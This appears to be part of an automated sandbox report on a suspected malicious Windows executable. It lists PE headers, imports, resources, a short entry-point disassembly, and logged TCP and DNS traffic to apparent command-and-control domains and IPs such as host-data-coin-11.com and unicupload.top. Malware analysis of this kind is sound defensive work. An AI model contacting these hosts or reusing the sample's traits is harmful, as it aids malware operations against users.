                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                                                            Time Stamp:0x5F8E9300 [Tue Oct 20 07:34:24 2020 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:6d4af36ccbaddaffd179ef41d42df9cf

                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            call 00007F61210D6FE7h
                                                                                                                                                                                                            jmp 00007F61210D0F9Dh
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                            test ecx, 00000003h
                                                                                                                                                                                                            je 00007F61210D1146h
                                                                                                                                                                                                            mov al, byte ptr [ecx]
                                                                                                                                                                                                            add ecx, 01h
                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                            je 00007F61210D1170h
                                                                                                                                                                                                            test ecx, 00000003h
                                                                                                                                                                                                            jne 00007F61210D1111h
                                                                                                                                                                                                            add eax, 00000000h
                                                                                                                                                                                                            lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                                                            lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                                                            mov eax, dword ptr [ecx]
                                                                                                                                                                                                            mov edx, 7EFEFEFFh
                                                                                                                                                                                                            add edx, eax
                                                                                                                                                                                                            xor eax, FFFFFFFFh
                                                                                                                                                                                                            xor eax, edx
                                                                                                                                                                                                            add ecx, 04h
                                                                                                                                                                                                            test eax, 81010100h
                                                                                                                                                                                                            je 00007F61210D110Ah
                                                                                                                                                                                                            mov eax, dword ptr [ecx-04h]
                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                            je 00007F61210D1154h
                                                                                                                                                                                                            test ah, ah
                                                                                                                                                                                                            je 00007F61210D1146h
                                                                                                                                                                                                            test eax, 00FF0000h
                                                                                                                                                                                                            je 00007F61210D1135h
                                                                                                                                                                                                            test eax, FF000000h
                                                                                                                                                                                                            je 00007F61210D1124h
                                                                                                                                                                                                            jmp 00007F61210D10EFh
                                                                                                                                                                                                            lea eax, dword ptr [ecx-01h]
                                                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            lea eax, dword ptr [ecx-02h]
                                                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            lea eax, dword ptr [ecx-03h]
                                                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            lea eax, dword ptr [ecx-04h]
                                                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            mov edi, edi
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push edi
                                                                                                                                                                                                            push 00000008h
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            mov esi, 004142D8h
                                                                                                                                                                                                            lea edi, dword ptr [ebp-20h]
                                                                                                                                                                                                            rep movsd
                                                                                                                                                                                                            mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                            mov eax, dword ptr [ebp+0Ch]
                                                                                                                                                                                                            pop edi
                                                                                                                                                                                                            mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                            je 00007F61210D112Eh
                                                                                                                                                                                                            test byte ptr [eax], 00000008h

                                                                                                                                                                                                            Rich Headers

                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                                                                                                            • [LNK] VS2008 build 21022
                                                                                                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                                                                                                            • [C++] VS2008 build 21022

                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x176680x28.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x410000xcd20.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x141d00x1c.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x169400x40.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x140000x188.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                            Sections

                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x122230x12400False0.611488655822data6.67194983583IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rdata0x140000x3f320x4000False0.366027832031data5.43383883533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .data0x180000x281780x22200False0.252253605769data2.7902507697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rsrc0x410000xcd200xce00False0.65973907767data6.33812987137IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                            Resources

                                                                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                            RT_CURSOR0x4d0880x130dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x415700xea8dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x424180x8a8dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x42cc00x6c8dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x433880x568GLS_BINARY_LSB_FIRSTBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x438f00x25a8dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x45e980x10a8dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x46f400x988dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x478c80x468GLS_BINARY_LSB_FIRSTBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x47da80xea8dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x48c500x8a8dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x494f80x25a8dBase III DBT, version number 0, next free block index 40BulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x4baa00x10a8dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ICON0x4cb480x468GLS_BINARY_LSB_FIRSTBulgarianBulgaria
                                                                                                                                                                                                            RT_DIALOG0x4d3880x72dataBulgarianBulgaria
                                                                                                                                                                                                            RT_STRING0x4d4000x452dataBulgarianBulgaria
                                                                                                                                                                                                            RT_STRING0x4d8580x1ecdataBulgarianBulgaria
                                                                                                                                                                                                            RT_STRING0x4da480x2d4dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ACCELERATOR0x4d0000x60dataBulgarianBulgaria
                                                                                                                                                                                                            RT_ACCELERATOR0x4d0600x28dataBulgarianBulgaria
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4d1b80x14dataBulgarianBulgaria
                                                                                                                                                                                                            RT_GROUP_ICON0x47d300x76dataBulgarianBulgaria
                                                                                                                                                                                                            RT_GROUP_ICON0x4cfb00x4cdataBulgarianBulgaria
                                                                                                                                                                                                            RT_VERSION0x4d1d00x1b8COM executable for DOSBulgarianBulgaria

                                                                                                                                                                                                            Imports

                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            KERNEL32.dllGetConsoleAliasesLengthW, GetLocaleInfoA, SetComputerNameExA, VirtualQuery, GetDefaultCommConfigW, FindResourceExW, OpenJobObjectA, GetConsoleAliasA, InterlockedDecrement, CompareFileTime, GetProfileSectionA, GetConsoleAliasesA, GetConsoleTitleA, ReadConsoleW, SetFileTime, GlobalAlloc, Sleep, GetFileAttributesW, GetAtomNameW, SetConsoleTitleA, RaiseException, GetLastError, GetProcAddress, GetLongPathNameA, VirtualAlloc, PrepareTape, DnsHostnameToComputerNameA, GetFileType, GetModuleFileNameA, CreateIoCompletionPort, GetModuleHandleA, GetStringTypeW, GetVersionExA, ReadConsoleInputW, EnumSystemLocalesW, CreateThread, HeapAlloc, GetCommandLineA, GetStartupInfoA, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualFree, HeapReAlloc, HeapCreate, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, SetFilePointer, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, LoadLibraryA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, SetEndOfFile, GetProcessHeap, ReadFile, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW

                                                                                                                                                                                                            Version Infos

                                                                                                                                                                                                            DescriptionData
                                                                                                                                                                                                            ProjectVersion3.10.70.57
                                                                                                                                                                                                            InternationalNamebomgvioci.iwa
                                                                                                                                                                                                            CopyrightCopyrighz (C) 2021, fudkort
                                                                                                                                                                                                            Translation0x0129 0x0794

                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                            BulgarianBulgaria

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.700728893 CET4975780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.751893997 CET804975793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.752464056 CET4975780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.752650976 CET4975780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.752722025 CET4975780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.803678989 CET804975793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.831883907 CET804975793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.831932068 CET804975793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.832021952 CET4975780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.832983017 CET4975780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.883764029 CET804975793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.132188082 CET4975880192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.184010983 CET804975893.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.184151888 CET4975880192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.184447050 CET4975880192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.184628963 CET4975880192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.236144066 CET804975893.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.236186981 CET804975893.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.267343044 CET804975893.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.267443895 CET4975880192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.267524958 CET4975880192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.319272041 CET804975893.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.566634893 CET4975980192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.617369890 CET804975993.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.617489100 CET4975980192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.617583990 CET4975980192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.617592096 CET4975980192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.667978048 CET804975993.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.700390100 CET804975993.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.700601101 CET4975980192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.700886011 CET4975980192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.727956057 CET4976080192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.751260996 CET804975993.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.780221939 CET804976093.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.780467033 CET4976080192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.780556917 CET4976080192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.780582905 CET4976080192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.832581043 CET804976093.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.859749079 CET804976093.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.859872103 CET4976080192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.860147953 CET4976080192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.912049055 CET804976093.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.180980921 CET4976180192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.231817007 CET804976193.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.231981039 CET4976180192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.232136011 CET4976180192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.232738972 CET4976180192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.282712936 CET804976193.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.283221960 CET804976193.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.336328983 CET804976193.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.336402893 CET4976180192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.336802006 CET4976180192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.365504026 CET4976280192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.387439966 CET804976193.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.416001081 CET804976293.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.416177034 CET4976280192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.416275024 CET4976280192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.417011023 CET4976280192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.466563940 CET804976293.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.467245102 CET804976293.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.521066904 CET804976293.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.521214008 CET4976280192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.521457911 CET4976280192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.529535055 CET4976380192.168.2.6185.186.142.166
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.571800947 CET804976293.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.583322048 CET8049763185.186.142.166192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.094142914 CET4976380192.168.2.6185.186.142.166
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.148092031 CET8049763185.186.142.166192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.656721115 CET4976380192.168.2.6185.186.142.166
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.710422039 CET8049763185.186.142.166192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.758996964 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.809745073 CET804976493.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.810252905 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.810374022 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.810390949 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.861114979 CET804976493.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.889929056 CET804976493.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.891474009 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.891846895 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.920666933 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.944318056 CET804976493.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.971151114 CET804976593.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.971775055 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.971883059 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.971903086 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.022485018 CET804976593.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.055574894 CET804976593.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.055663109 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.055943966 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.084707022 CET4976780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.106786013 CET804976593.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.136225939 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.137375116 CET4976780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.137502909 CET4976780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198638916 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198667049 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198684931 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198704004 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198723078 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198745966 CET804976793.189.42.167192.168.2.6

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.381481886 CET192.168.2.68.8.8.80xae58Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.843453884 CET192.168.2.68.8.8.80xd607Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.277985096 CET192.168.2.68.8.8.80xf5fcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.710042000 CET192.168.2.68.8.8.80x7b7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.869241953 CET192.168.2.68.8.8.80xc752Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.345701933 CET192.168.2.68.8.8.80x548Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.738148928 CET192.168.2.68.8.8.80x9370Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.902550936 CET192.168.2.68.8.8.80x3119Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.064692020 CET192.168.2.68.8.8.80x1268Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:14.813620090 CET192.168.2.68.8.8.80x3c85Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:15.245038033 CET192.168.2.68.8.8.80x9861Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:15.407557964 CET192.168.2.68.8.8.80x48b1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:15.683904886 CET192.168.2.68.8.8.80x5ab0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:15.836492062 CET192.168.2.68.8.8.80x8b66Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:15.995913982 CET192.168.2.68.8.8.80x59b9Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:16.341053009 CET192.168.2.68.8.8.80x1dbcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:16.495242119 CET192.168.2.68.8.8.80x81beStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:16.675658941 CET192.168.2.68.8.8.80xe044Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:16.838521004 CET192.168.2.68.8.8.80xa2d1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:17.027964115 CET192.168.2.68.8.8.80xfa97Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:20.687021017 CET192.168.2.68.8.8.80x8f92Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:20.852571964 CET192.168.2.68.8.8.80x5119Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:21.034580946 CET192.168.2.68.8.8.80x5a1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:21.496798038 CET192.168.2.68.8.8.80x173Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:23.839807987 CET192.168.2.68.8.8.80x2424Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:24.006145954 CET192.168.2.68.8.8.80x632aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:24.169416904 CET192.168.2.68.8.8.80x4aa9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:24.671953917 CET192.168.2.68.8.8.80x80a3Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:26.515676022 CET192.168.2.68.8.8.80xf16Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:26.704545975 CET192.168.2.68.8.8.80x805bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:26.866780996 CET192.168.2.68.8.8.80x2c4aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:41.571877003 CET192.168.2.68.8.8.80x21c0Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:44.258790970 CET192.168.2.68.8.8.80xd574Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:48.408039093 CET192.168.2.68.8.8.80x5e27Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:48.602161884 CET192.168.2.68.8.8.80x404fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:48.759782076 CET192.168.2.68.8.8.80x34f7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:48.929415941 CET192.168.2.68.8.8.80x7f29Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:49.090981960 CET192.168.2.68.8.8.80x75Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:49.262195110 CET192.168.2.68.8.8.80xb816Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:49.425590038 CET192.168.2.68.8.8.80x8551Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:49.584451914 CET192.168.2.68.8.8.80xcef6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:49.750351906 CET192.168.2.68.8.8.80x637fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
